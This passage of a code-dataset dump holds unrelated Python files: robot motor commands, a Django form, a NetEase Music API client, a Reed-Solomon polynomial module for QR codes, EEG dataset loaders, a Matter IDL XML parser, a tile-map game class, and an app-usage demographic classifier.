32768\n\tdistance=min(distance,256**2-1)\n\tdistance=max(0,distance)\n\tangle = min(angle,256**2-1)\n\tangle = max(0,angle)\n\tArg1 = distance/256\n\tArg0 = distance%256\n\tArg3 = angle/256\n\tArg2 = angle%256\n\n\tmove.write(chr(6)+chr(4) +chr(Arg0) +chr(Arg1) +chr(Arg2) +chr(Arg3))\n\n\ndef avancer(t): ##case 1\n\tdistance,speed = t\n\tdistance += 32768\n\tspeed += 32768\n\tdistance=min(distance,256**2-1)\n\tdistance=max(0,distance)\n\tspeed=min(speed,256**2-1)\n\tspeed=max(0,speed)\n\tArg1 = distance/256\n\t#Arg0 = distance - 256*Arg1\n\tArg0=distance%256\n\tArg3 = speed/256\n\t#Arg2 = speed - 256*Arg3\n\tArg2 = speed %256\n\tmove.write(chr(1)+chr(4)+chr(Arg0)+chr(Arg1)+chr(Arg2)+chr(Arg3))\n\ndef r(): #case2\n\tmove.write(chr(2)+chr(0))\n\ndef re(): #case999\n\tmove.write(chr(999)+chr(0))\n\ndef tourner(angle): #case3\n\tangle += 32768\n\tif angle > 256**2 - 1:\n\t\tangle = 256**2 - 1\n\tif angle < 0 :\n\t\tangle = 0\n\tArg1 = angle/256\n\tArg0 = angle - 256*Arg1\n\tmove.write(chr(3)+chr(2)+chr(Arg0)+chr(Arg1))\n\ndef setNewTarget(t): #case4, x et y en clicks\n\tx,y=t\n\tx += 32768\n\tif x > 256**2 - 1:\n\t\tx = 256**2 - 1\n\tif x < 0 :\n\t\tx = 0\n\tArg1 = x/256\n\tArg0 = x - 256*Arg1\n\ty += 32768\n\tif y > 256**2 - 1:\n\t\ty = 256**2 - 1\n\tif y < 0 :\n\t\ty = 0\n\tArg3 = y/256\n\tArg2 = y - 256*Arg3\n\tmove.write(chr(4)+chr(4)+chr(Arg0)+chr(Arg1)+chr(Arg2)+chr(Arg3))\n\ndef hasArrived(): #case5\n\tmove.write(chr(5)+chr(0))\n\ndef readPos(): #case140\n\tmove.write(chr(140)+chr(0))\n\n","sub_path":"Fichiers_Python_Raspberry/fonctions.py","file_name":"fonctions.py","file_ext":"py","file_size_in_byte":2890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"290460920","text":"from django import forms\nfrom .models import SuperHeroApp\n\n# choices\nRICH_POWER_CHOICES = (\n ('rich', 'Rich'),\n ('superpower', 'Superpower'),\n)\n\n# choices\nSUPER_POWER_CHOICES = (\n ('flight', 'Flight'),\n ('speed', 'Speed'),\n ('telekenetic', 'Telekenetic'),\n ('healing', 'Healing'),\n ('invisibility', 'Invisibility'),\n ('time travel', 'Time Travel'),\n\n)\n\n# choices\nGOOD_BAD_CHOICES = (\n ('good', 'Good'),\n ('kinda good', 'Kinda Good'),\n ('lukewarm', 'Lukewarm'),\n ('sorta evil', 'Sorta Evil'),\n ('hell hot', 'Hell Hot'),\n)\n\n# form for model\nclass SuperForm(forms.ModelForm):\n class 
Meta:\n model = SuperHeroApp\n fields = \"__all__\"\n # labels for form questions\n labels ={\n \"name\": \"Name\",\n \"cityorigin\": \"City/Origin/Planet\",\n \"richpower\": \"Are you rich, or have superpowers?\",\n \"whichPower\": \"If superpower, which one(s)?\",\n \"goodEvil\": \"On a scale of Heaven and Hell, which are you?\",\n \"examples\": \"Give us 3 examples of when you used your super hero abilities:\",\n }\n # to show specific widget types for form questions\n widgets = {\n \"richpower\": forms.RadioSelect(choices=RICH_POWER_CHOICES),\n \"whichPower\": forms.CheckboxSelectMultiple(choices=SUPER_POWER_CHOICES),\n \"goodEvil\": forms.Select(choices=GOOD_BAD_CHOICES),\n\n }","sub_path":"SuperHeroApp/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"10609154","text":"#!/usr/bin/env python2.7\n# -*- coding: utf-8 -*-\n\n__author__ = 'Quan zhou'\n\nimport os\nimport json\nimport base64\nimport requests\n\nfrom Crypto.Cipher import AES\n\ndefault_timeout = 10\n\nmodulus = '00e0b509f6259df8642dbc35662901477df22677ec152b5ff68ace615bb7b725152b3ab17a876aea8a5aa76d2e417629ec4ee341f56135fccf695280104e0312ecbda92557c93870114af6c9d05c4f7f0c3685b7a46bee255932575cce10b424d813cfe4875d3e82047b97ddef52741d546b8e289dc6935b3ece0462db0a22b8e7'\nnonce = '0CoJUm6Qyw8W8jud'\npubKey = '010001'\nusr_agent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36'\n\n# 新api的加密方式(from Github网易云API)\ndef aesEncrypt(text, secKey):\n pad = 16 - len(text) % 16\n text = text + pad * chr(pad)\n encryptor = AES.new(secKey, 2, '0102030405060708')\n ciphertext = encryptor.encrypt(text)\n ciphertext = base64.b64encode(ciphertext)\n return ciphertext\n\ndef rsaEncrypt(text, pubKey, modulus):\n text = text[::-1]\n rs = int(text.encode('hex'), 16)**int(pubKey, 16) % int(modulus, 16)\n return format(rs, 'x').zfill(256)\n\n\ndef createSecretKey(size):\n return (''.join(map(lambda xx: (hex(ord(xx))[2:]), os.urandom(size))))[0:16]\n\ndef encrypted_request(text):\n text = json.dumps(text)\n secKey = createSecretKey(16)\n encText = aesEncrypt(aesEncrypt(text, nonce), secKey)\n encSecKey = rsaEncrypt(secKey, pubKey, modulus)\n data = {\n 'params': encText,\n 'encSecKey': encSecKey\n }\n return data\n\nclass NeteaseApi(object):\n \"\"\"网易云Api,可用来查询相关数据\n\n \"\"\"\n def __init__(self, user_agent=usr_agent):\n self.header = {\n 'Host': 'music.163.com',\n 'Referer': 'http://music.163.com',\n 'Accept': '*/*',\n 'Accept-Encoding': 'gzip,deflate,sdch',\n 'Accept-Language': 'zh-CN,zh;q=0.8,gl;q=0.6,zh-TW;q=0.4',\n 'Connection': 'keep-alive',\n 'Content-Type': 'application/x-www-form-urlencoded',\n 'User-Agent': usr_agent,\n }\n self.cookies = {\n 'appver': '1.5.2'\n }\n self.session = requests.Session()\n\n def get_event(self, uid, offset=0, total='true', limit=60):\n action = 'http://music.163.com/weapi/event/get/' + uid + '?csrf_token='\n #print(action)\n data = {\n 'offset': offset,\n 'total': total,\n 'limit': 10\n }\n return self.httpRequest('POST', action, data)\n\n def get_user(self, uid, offset=0, total='false', limit=60):\n record = self.get_event(uid)\n if record['code'] != 200:\n return {'code': 400 }# Bad Request\n resp = {\n 'code': 200,\n 'user': record['events'][0]['user']\n }\n return resp\n\n def get_follows(self):\n # action = 'http://music.163.com/weapi/user/getfollows/30529065?csrf_token='\n pass\n\n def get_followeds(self, 
uid, offset=0, total='true', limit=60):\n action = 'http://music.163.com/weapi/user/getfolloweds/?csrf_token='\n data = { \"userId\": uid,\n 'offset': offset,\n 'total': total,\n 'limit': 10\n }\n return self.httpRequest('POST', action, data)\n\n def search(self, s, stype=1, offset=0, total='true', limit=60):\n '''\n search for entities\n '''\n action = 'http://music.163.com/weapi/search/get'\n data = {\n 's': s,\n 'type': stype,\n 'offset': offset,\n 'total': total,\n 'limit': 60\n }\n return self.httpRequest('POST', action, data)\n\n def httpRequest(self, method, action, query=None, timeout=None):\n connection = json.loads(self.rawHttpRequest(method, action, query, timeout))\n return connection\n\n def rawHttpRequest(self, method, action, query=None, timeout=None):\n query = encrypted_request(query)\n\n if (method == 'GET'):\n url = action if (query == None) else (action + '?' + query)\n connection = self.session.get(url, headers=self.header, timeout=default_timeout)\n\n elif (method == 'POST'):\n connection = self.session.post(\n action,\n data=query,\n headers=self.header,\n timeout=default_timeout\n )\n connection.encoding = \"UTF-8\"\n return connection.text\n\nif __name__ == '__main__':\n n = NeteaseApi()\n from pprint import pprint\n pprint(n.get_user('30529065'))\n pprint(n.get_followeds('30529065'))\n","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":4663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"614087325","text":"#!/usr/bin/python3\n\nfrom qrcodeoutils import *\n\nannulateur=285#0x11d#0b100011101\n\n@memorise\nclass F256():\n def __init__(self,s):\n if isinstance(s,str) or hasattr(s,'__iter__') or hasattr(s,'iter'):\n self.val=bin2dec(s)\n elif type(s) is F256:\n self.val=s.val\n else:\n self.val=s\n while True:\n ch=bin(self.val)[2:]\n if len(ch)<=8:\n break\n self.val^=annulateur*2**(9-len(ch))\n self.corps=F256\n def __str__(self):\n# nb=bin(self.val)[2:]\n# nb=\"0\"*(8-len(nb))+nb\n# nb2=\"\"\n# for c in nb:\n# nb2=nb2+c+\"\\u0305\"\n nb=hex(self.val)[2:]\n return nb\n def __repr__(self):\n return str(self)\n def __add__(self,n):\n return F256(self.val^n.val)\n def __sub__(self,n):\n return self+n\n def __neg__(self):\n return self\n def __mul__(self,n):\n if self.val==0 or n.val==0:\n return F256(0)\n else:\n return F256(F256.exp((self.log()+n.log())))\n def __truediv__(self,n):\n if n.val==0:\n raise ZeroDivisionError\n if self.val==0:\n return F256(0)\n return F256(F256.exp((self.log()-n.log())))\n def __pow__(self,e):\n if self.val==0:\n if e<0:\n raise ZeroDivisionError\n elif e==0:\n return F256(1)\n else:\n return F256(0)\n return F256(F256.exp((e*self.log())))\n def log(self):\n if self.val==0:\n raise ZeroDivisionError\n return F256.log[self.val]\n\nF256.log=dict()\nexp=[]\nnb=1\nfor i in range(255):\n F256.log[nb]=i\n exp.append(nb)\n nb*=2\n if nb>=256:\n nb^=annulateur\nF256.exp=lambda i:exp[i%255]\n#F256.exp.append(1)\n#F256.exp*=2\nF256.__name__=\"𝔽_2⁸\"\n\n@memorise\nclass Polynome(ElementAnneau):\n\n def __init__(self,c):\n if type(c) is Polynome:\n self.coefficients=tuple(c.coefficients)\n elif type(c) is Polynome.corps:\n self.coefficients=(c,)\n elif not hasattr(c,'__iter__') and not hasattr(c,'iter'):\n self.coefficients=(Polynome.corps(c),)\n else:\n self.coefficients=tuple(c)\n try:\n while self.coefficients[0]==Polynome.corps(0):\n self.coefficients=self.coefficients[1:]\n except IndexError:\n pass\n\n def estzero(self):\n return self.coefficients==tuple()\n\n 
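# usage sketch (editor's addition, illustrative values only): coefficients are\n # stored highest-degree first, and + and - are both XOR in characteristic 2:\n # p = Polynome.construction([1, 0, 1]) # X**2 + 1 over GF(2**8)\n # p.estzero() # -> False\n # (p - p).estzero() # -> True\n 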
def __str__(self):\n if self.estzero():\n return \"0\"\n expo={\"0\":\"⁰\",\"1\":\"¹\",\"2\":\"²\",\"3\":\"³\",\"4\":\"⁴\",\"5\":\"⁵\",\"6\":\"⁶\",\"7\":\"⁷\",\"8\":\"⁸\",\"9\":\"⁹\"}\n return \"+\".join([str(self.coefficients[i])+\"X\"+\"\".join(expo[j] for j in str(self.degre()-i)) for i in range(len(self)) if self.coefficients[i]!=Polynome.corps(0)])\n\n def __repr__(self):\n return str(self)\n\n def __call__(self,val):\n res=Polynome(tuple())\n if type(val) is type(self):\n va=val\n else:\n va=Polynome(tuple([val]))\n for c in self:\n res*=va\n res+=Polynome(tuple([c]))\n if type(val) is type(self):\n return res\n if res.coefficients:\n return res[0]\n return Polynome.corps(0)\n def __abs__(self):\n return len(self.coefficients)\n def __len__(self):\n return len(self.coefficients)\n def __iter__(self):\n return iter(self.coefficients)\n def iter(self):\n return self.__iter__()\n def __getitem__(self,i):\n return self.coefficients[self.degre()-i]\n def __setitem__(self,i,x):\n coef=list(self.coefficients)\n coef[self.degre()-i]=x\n self.coefficients=tuple(coef)\n def coefficientdominant(self):\n return self.coefficients[0]\n def degre(self):\n return abs(self)-1\n def __eq__(self,autre):\n return self.coefficients==autre.coefficients#all([x==y for (x,y) in zip(self,autre)])\n def __add__(self,autre):\n somme=[Polynome.corps(0)]*(max(len(self),len(autre))-len(self))+list(self.coefficients)\n for i in range(len(autre)):\n somme[-i-1]+=autre[i]\n return Polynome(tuple(somme))\n def __xor__(self,autre):\n return self+autre\n def __neg__(self):\n return Polynome(tuple((-a for a in self)))\n def __sub__(self,autre):\n return self+(-autre)\n def __mul__(self,autre):\n if self.estzero() or autre.estzero():\n return Polynome(tuple())\n prod=[Polynome.corps(0) for _ in range(len(self)+len(autre)-1)]\n for i in range(len(self)):\n for j in range(len(autre)):\n prod[-i-j-1]+=autre[j]*self[i]\n return Polynome(tuple(prod))\n def __pow__(self,exp):\n if exp>0:\n prod=Polynome(tuple([Polynome.corps(1)]))\n x=Polynome(self.coefficients)\n while exp>1:\n if exp%2:\n prod*=x\n x*=x\n exp//=2\n return prod*x\n elif exp==0:\n return Polynome(tuple([Polynome.corps(1)]))\n\n def __divmod__(self,diviseur):\n quotient,reste=Polynome(tuple()),self\n degdiviseur=diviseur.degre()\n coefdom=diviseur.coefficientdominant()\n while reste.degre()>=degdiviseur:\n monomediviseur=Polynome(tuple([reste.coefficientdominant()/coefdom]+[Polynome.corps(0)]*(reste.degre()-degdiviseur)))#)+zeros)\n quotient+=monomediviseur\n reste-=monomediviseur*diviseur\n# print(\":\",quotient,reste)\n return quotient,reste\n\n def __floordiv__(self,div):\n q,_=divmod(self,div)\n return q\n def __mod__(self,div):\n _,r=divmod(self,div)\n return r\n\n def bezoutpoly(self,p2):\n r,u,v,rr,uu,vv=p2,Polynome.construction([1]),Polynome.construction([0]),self,Polynome.construction([0]),Polynome.construction([1])\n while not rr.estzero():\n# while rr.degre()>=len(p2)/2:\n q=r//rr\n r,u,v,rr,uu,vv=rr,uu,vv,r-q*rr,u-q*uu,v-q*vv\n return v,u,r\n\n def der(self):\n# l=self.degre()\n derive=[Polynome.corps(0) for _ in self]\n for i in range(len(self)):\n if i%2==1:\n derive[-i-1]=self[i]\n# print(i,self[i])\n# print(derive)\n return Polynome(tuple(derive[:-1]))\n\nPolynome.corps=F256\nPolynome.__name__=\"(%s)[x]\"%F256.__name__\nPolynome.construction=lambda L: Polynome(tuple(F256(x) for x in L))\n\ndef message2poly(message):\n poly=[]\n# print(len(message))\n for i in range(len(message)//8):\n poly.append(F256(bin2dec(message[8*i:8*i+8])))\n# 
print(poly)\n return Polynome(tuple(poly))\n\ndef poly2message(poly):\n mess=poly.coefficients\n liste=[]\n for c in mess:\n b=[int(i) for i in bin(c.val)[2:]]\n liste=liste+[0]*(8-len(b))+b\n return liste\n\n#def bezoutpoly(p1,p2):\n# r,u,v,rr,uu,vv=p2,Polynome.construction([1]),Polynome.construction([0]),p1,Polynome.construction([0]),Polynome.construction([1])\n# while not rr.estzero():\n# q=r//rr\n# r,u,v,rr,uu,vv=rr,uu,vv,r-q*rr,u-q*uu,v-q*vv\n# return u,v,r\n\nif __name__==\"__main__\":\n a=F256(140)\n print(a)\n b=F256(\"101\")\n print(b)\n# b=F256((1,0,1))\n# print(b)\n print(a.log())\n print(b+a)\n print(a*a*a*a*a*a)\n print(a**6)\n# print([F256(i) for i in F256.exp[:15]])\n erreurs=[]\n for i in range(256):\n if F256.log[F256.exp(i)]!=i:\n erreurs.append([i,F256.log[F256.exp(i)]])\n if not erreurs:\n print(\"log et exp OK.\")\n else:\n print(erreurs)\n print(F256.log[128])\n print(Polynome.__name__)\n poly=Polynome.construction\n p=poly((15,1,12))\n q=poly((\"11\",\"10110\",\"0\"))\n print(p,q)\n print(p+q)\n# print(a*p)\n print(p%q)\n print(divmod(p,q))\n print(p//q*q+p%q)\n print(p^q)\n print(p*p)\n print(p**2)\n print(p(F256(1)))\n print(p(q))\n print(p(q).der())\n# p*=q\n# p=poly([0x12,0x34,0x56,0,0,0,0])\n# q=poly([1,0xf,0x36,0x78,0x40])\n# print(divmod(p,q))\n message=\"4254c6973657a20474e552f4c696e7578206d6167617a696e65204672616e63652e20f09f98830ec11ec11ec11ec11ec11ec11ec11ec11\"\n correction=\"0b1622eb6e2c152a08d34a2dd8c788\"\n\n# message=\"40d2754776173206272696c6c69670ec\"\n# correction=\"bc2a90136bafeffd4be0\"\n\n polynome=[]\n for i in range(len(message)//2):\n polynome=polynome+[eval(\"0x\"+message[2*i:2*i+2])]\n polynome=poly(polynome+[0]*(len(correction)//2))\n# print(len(polynome))\n# print(polynome)\n modulo=poly([1])\n for i in range(len(correction)//2):\n modulo*=poly([1,F256.exp(i)])\n# print(modulo)\n reste=polynome%modulo\n ch=\"\"\n for i in reste.coefficients:\n s=str(i)\n ch=ch+\"0\"*(2-len(s))+s\n print(ch)\n print(correction)\n# print(''.join(str(i) for i in (polynome%modulo).coefficients))\n# for i in range(len(F256.exp)):\n# print(i,bin(F256.exp[i])[2:])\n# for i in range(1,256):\n# print(i,F256.log[i])\n# print(len(F256.exp),len(F256.log))\n","sub_path":"Reperes/QR_code/qrcorps.py","file_name":"qrcorps.py","file_ext":"py","file_size_in_byte":8111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"72680542","text":"import math\ncount = 1\nnum = 2\nprimes = [2]\nwhile True:\n\t# print(num),\n\t# ok=0\n\tif num%2==0 and num!=2:\n\t\t# print('no'),\n\t\tok=0\n\telse:\n\t\tcheckmax = math.sqrt(num)\n\t\t# print(num, checkmax)\n\t\tfor i in primes:\n\t\t\tok=0\n\t\t\tif i > checkmax + 1: \n\t\t\t\tok = 1\n\t\t\t\tbreak\n\t\t\telif num % i == 0:\n\t\t\t\t# print(i),\n\t\t\t\tbreak\n\t\t\tok = 1\n\n\tif ok:\n\t\t# print(num)\n\t\tprimes.append(num)\n\t\t# print(primes)\n\tif len(primes)==10001:\n\t\tbreak\n\n\tnum += 1\n\t# print\nprint(primes[-1])","sub_path":"euler/p007_yb.py","file_name":"p007_yb.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"201326363","text":"\"\"\"\nBNCI 2014-001 Motor imagery dataset.\n\"\"\"\n\nfrom .base import BaseDataset\nfrom mne.datasets.bnci import load_data\n\n\nclass MNEBNCI(BaseDataset):\n \"\"\"Base BNCI dataset\"\"\"\n\n def get_data(self, subjects):\n \"\"\"return data for a list of subjects.\"\"\"\n data = []\n for subject in subjects:\n 
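# one entry per subject: the raw MNE file list returned by load_data below\n 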
data.append(self._get_single_subject_data(subject))\n return data\n\n def _get_single_subject_data(self, subject):\n \"\"\"return data for a single subject\"\"\"\n raw_files, event_id = load_data(subject=subject, dataset=self.code,\n verbose=False)\n return raw_files\n\n\nclass BNCI2014001(MNEBNCI):\n \"\"\"BNCI 2014-001 Motor Imagery dataset\"\"\"\n\n def __init__(self):\n self.subject_list = range(1, 10)\n self.name = 'BNCI 2014-001 Motor Imagery'\n self.code = '001-2014'\n\n\nclass BNCI2014002(MNEBNCI):\n \"\"\"BNCI 2014-002 Motor Imagery dataset\"\"\"\n\n def __init__(self):\n self.subject_list = range(1, 15)\n self.name = 'BNCI 2014-002 Motor Imagery'\n self.code = '002-2014'\n\n\nclass BNCI2014004(MNEBNCI):\n \"\"\"BNCI 2014-004 Motor Imagery dataset\"\"\"\n\n def __init__(self):\n self.subject_list = range(1, 10)\n self.name = 'BNCI 2014-004 Motor Imagery'\n self.code = '004-2014'\n\n\nclass BNCI2015001(MNEBNCI):\n \"\"\"BNCI 2015-001 Motor Imagery dataset\"\"\"\n\n def __init__(self):\n self.subject_list = range(1, 13)\n self.name = 'BNCI 2015-001 Motor Imagery'\n self.code = '001-2015'\n","sub_path":"moabb/datasets/bnci.py","file_name":"bnci.py","file_ext":"py","file_size_in_byte":1539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"20748163","text":"\"\"\"Tests for src/link_parser.py\"\"\"\nimport unittest\nfrom unittest.mock import patch, Mock\n\nfrom link_parser import ThreadPoolLinkHandler\n\n\nclass TestThreadPoolLinkHandler(unittest.TestCase):\n def setUp(self):\n self.link = \"http://en.wikipedia.org/wiki/Genus\"\n self.max_workers = 10\n self.wiki = ThreadPoolLinkHandler(self.link, self.max_workers)\n\n @patch(\"link_parser.requests.Session.get\")\n def test_url_downloader(self, mocked_get):\n mocked_get.return_value = Mock(status_code=200, text=\"1\")\n result = self.wiki.url_downloader(self.link)\n mocked_get.assert_called_with(self.link, timeout=1)\n assert result == \"1\"\n\n @patch(\"requests.sessions.Session.head\")\n def test_check_url_headers(self, mocked_head):\n mocked_head.return_value.status_code = 200\n mocked_head.return_value.headers = {\"Last-Modified\": \"some_date\"}\n result = self.wiki.check_url_headers(self.link)\n mocked_head.assert_called_with(self.link, timeout=1)\n assert result == \"some_date\"\n","sub_path":"tests/test_link_parser.py","file_name":"test_link_parser.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"55414401","text":"# Copyright (c) 2022 Project CHIP Authors\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport logging\nimport typing\nimport xml.sax.handler\nfrom dataclasses import dataclass\nfrom typing import List, Optional, Union\n\nfrom matter_idl.matter_idl_types import Idl\nfrom matter_idl.zapxml.handlers import Context, ZapXmlHandler\n\n\nclass ParseHandler(xml.sax.handler.ContentHandler):\n \"\"\"A parser for ZAP-style XML data definitions.\n\n Defers its processing 
to ZapXmlHandler and keeps track of:\n - an internal context for all handlers\n - the parsed Idl structure that is incrementally built\n - sets up parsing location within the context\n - keeps track of ParsePath\n\n Overall converts a python SAX handler into matter_idl.zapxml.handlers\n \"\"\"\n\n def __init__(self, include_meta_data=True):\n super().__init__()\n self._idl = Idl()\n self._processing_stack = []\n # Context persists across all\n self._context = Context()\n self._include_meta_data = include_meta_data\n self._locator = None\n\n def PrepareParsing(self, filename):\n # This is a bit ugly: filename keeps changing during parse\n # IDL meta is not prepared for this (as source is XML and .matter is\n # single file)\n if self._include_meta_data:\n self._idl.parse_file_name = filename\n\n self._context.file_name = filename\n\n def Finish(self) -> Idl:\n self._context.PostProcess(self._idl)\n return self._idl\n\n def startDocument(self):\n if self._include_meta_data and self._locator:\n self._context.locator = self._locator\n self._processing_stack = [ZapXmlHandler(self._context, self._idl)]\n\n def endDocument(self):\n if len(self._processing_stack) != 1:\n raise Exception(\"Unexpected nesting!\")\n\n def startElement(self, name: str, attrs):\n logging.debug(\"ELEMENT START: %r / %r\" % (name, attrs))\n self._context.path.push(name)\n self._processing_stack.append(\n self._processing_stack[-1].GetNextProcessor(name, attrs))\n\n def endElement(self, name: str):\n logging.debug(\"ELEMENT END: %r\" % name)\n\n last = self._processing_stack.pop()\n last.EndProcessing()\n\n # important to pop AFTER processing end to allow processing\n # end to access the current context\n self._context.path.pop()\n\n def characters(self, content):\n self._processing_stack[-1].HandleContent(content)\n\n\n@dataclass\nclass ParseSource:\n \"\"\"Represents an input sopurce for ParseXmls.\n\n Allows for named data sources to be parsed.\n \"\"\"\n source: Union[str, typing.IO] # filename or stream\n # actual filename to use, None if the source is a filename already\n name: Optional[str] = None\n\n @ property\n def source_file_name(self):\n if self.name:\n return self.name\n return self.source # assume string\n\n\ndef ParseXmls(sources: List[ParseSource], include_meta_data=True) -> Idl:\n \"\"\"Parse one or more XML inputs and return the resulting Idl data.\n\n Params:\n sources - what to parse\n include_meta_data - if parsing location data should be included in the Idl\n \"\"\"\n handler = ParseHandler(include_meta_data=include_meta_data)\n\n for source in sources:\n logging.info('Parsing %s...' 
% source.source_file_name)\n handler.PrepareParsing(source.source_file_name)\n\n parser = xml.sax.make_parser()\n parser.setContentHandler(handler)\n parser.parse(source.source)\n\n return handler.Finish()\n","sub_path":"scripts/py_matter_idl/matter_idl/zapxml/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"575425280","text":"# coding:utf-8\n'''\njson文件读取\n'''\n\nimport json\nfire_path = r'/Users/xiaohuan/Desktop/face/xiaohuan/python/interface/excel_file/login.json'\n\n\nclass JsonRead():\n def __init__(self, file_name):\n self.file_name = file_name\n\n def get_read(self):\n fp = open(self.file_name, 'r', encoding='utf-8') #单纯打开文件\n json_data = fp.read() #读取文件\n fp.close() #关闭文件\n return json_data\n\nif __name__ == '__main__':\n jp = JsonRead(fire_path)\n result = jp.get_read()\n print(type(result))\n","sub_path":"interface_item/util/json_operate.py","file_name":"json_operate.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"410650576","text":"from objeto import Objeto\n\nclass Mapa(object):\n\tdef __init__(self, ambiente):\n\t\tself.amb = ambiente\n\t\tself.floor, self.wall, self.mapa = self.amb.sprite.Group(), self.amb.sprite.Group(), self.amb.sprite.Group()\n\t\tself.estrutura()\n\t\tself.colisao = []\n\n\tdef estrutura(self):\n\t\tself.fase = [\n\t\t\"WWWWWWWWWWWWWWW\",\n\t\t\"WFWFFFFFFFFFFFW\",\n\t\t\"WFWWWFFFFWWFFFW\",\n\t\t\"WFFFFFFFFFFFWWW\",\n\t\t\"WWWFFFWWFFFFFFW\",\n\t\t\"WFFFFFFFFFFWWFW\",\n\t\t\"WWWWWFFFFFFFFFW\",\n\t\t\"WFFFFFFWWFFFFFW\",\n\t\t\"WFFFWFFFFFFFFFW\",\n\t\t\"WWWWWWWWWWWWWWW\"\n\t\t]\n\n\t\tself.x, self.y = 0, 0\n\n\t\tfor i in range(len(self.fase)):\n\t\t\tfor j in range(len(self.fase[i])):\n\t\t\t\tif self.fase[i][j] == \"W\":\n\t\t\t\t\tsprite = Objeto(self.amb, 'parede64.png', (0,0), (self.x, self.y))\n\t\t\t\t\tself.wall.add(sprite)\n\t\t\t\t\tself.mapa.add(sprite)\n\t\t\t\tif self.fase[i][j] == \"F\":\n\t\t\t\t\tsprite = Objeto(self.amb, 'chao64.png', (0,0), (self.x, self.y))\n\t\t\t\t\tself.floor.add(sprite)\n\t\t\t\t\tself.mapa.add(sprite)\n\t\t\t\tself.x += sprite.get_size()[0]\n\t\t\tself.y += sprite.get_size()[1]\n\t\t\tself.x = 0\n\t\t\t\n\tdef return_colisao(self):\n\t\treturn self.wall","sub_path":"Jogo/mapa.py","file_name":"mapa.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"611457809","text":"\"\"\"Test translated pokemon module\"\"\"\n\nfrom fastapi.testclient import TestClient\n\nfrom app.core import settings\n\n\ndef test_get_translated_pokemon(client: TestClient) -> None:\n response = client.get(f\"{settings.API_V1_STR}/pokemon/translated/mewtwo\")\n pokemon = response.json()\n assert response.status_code == 200\n assert pokemon[\"name\"] == \"mewtwo\"\n\n\ndef test_pokemon_not_found(client: TestClient) -> None:\n response = client.get(f\"{settings.API_V1_STR}/pokemon/translated/asd\")\n pokemon = response.json()\n\n assert response.status_code == 404\n assert pokemon[\"status\"] is False\n\n\ndef test_pokemon_wrong_endpoint(client: TestClient) -> None:\n response = client.get(f\"{settings.API_V1_STR}/pokemon/translated\")\n assert response.status_code == 
404\n","sub_path":"tests/apis/v1/handlers/test_translated_pokemon.py","file_name":"test_translated_pokemon.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"378830014","text":"__author__ = 'hee'\n\nimport numpy as np\n\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.svm import SVC\n\nimport supervised_profiler as sp\n\n\ndef get_yj(app_domain, target='gender'):\n yj = sp.Experimenter(sp.YJ_USER_INFO, sp.YJ_INSTALLED_APPS)\n yj_app_incident_dict, yj_app_domain = yj.get_app_incident_dict(app_domain)\n X_yj, categories = sp.get_category_mat(yj_app_incident_dict, app_domain)\n\n yj_profile_ids = np.asarray(yj_app_incident_dict.keys())\n y_yj = yj.get_y(yj_profile_ids, target)\n return X_yj, y_yj, yj_profile_ids\n\n\nif __name__ == '__main__':\n experimenter = sp.Experimenter()\n targets = ('gender', 'job', 'religion', 'marriage', 'income', 'education', 'binned_age', 'hasChild')\n # targets = ('numberOfChildren', '')\n\n app_incident_dict, app_domain = experimenter.get_app_incident_dict(lower=1, upper=80)\n profile_ids = np.asarray(app_incident_dict.keys())\n\n user_category_mat, categories = sp.get_category_mat(app_incident_dict, app_domain)\n X = user_category_mat\n\n y_preds = list()\n for target in targets[:1]:\n y = experimenter.get_y(profile_ids, target)\n clf = LogisticRegression(C=1e2)\n\n # clf = RandomForestClassifier(n_estimators=100)\n # clf = SVC(C=1e2, kernel='linear')\n clf.fit(X, y)\n\n \"\"\"\n y_uniq, y_cnt = np.unique(y, return_counts=True)\n print target, float(np.max(y_cnt)) / np.sum(y_cnt),\n\n np.random.seed(39314)\n avg_acc, std_acc, avg_size, std_size = sp.iterative_kfold_validation_score(clf, X, y)\n print avg_acc, std_acc\n \"\"\"\n\n header = ['profile_id'] + [name for names, y_pred in y_preds for name in names]\n values = np.column_stack([profile_ids] + [tup[1] for tup in y_preds])\n output = np.vstack([header, values])\n \"\"\"\n np.savetxt(sp.DATA_DIR + \"category_pred_proba.csv\", output, fmt='%s', delimiter=',')\n 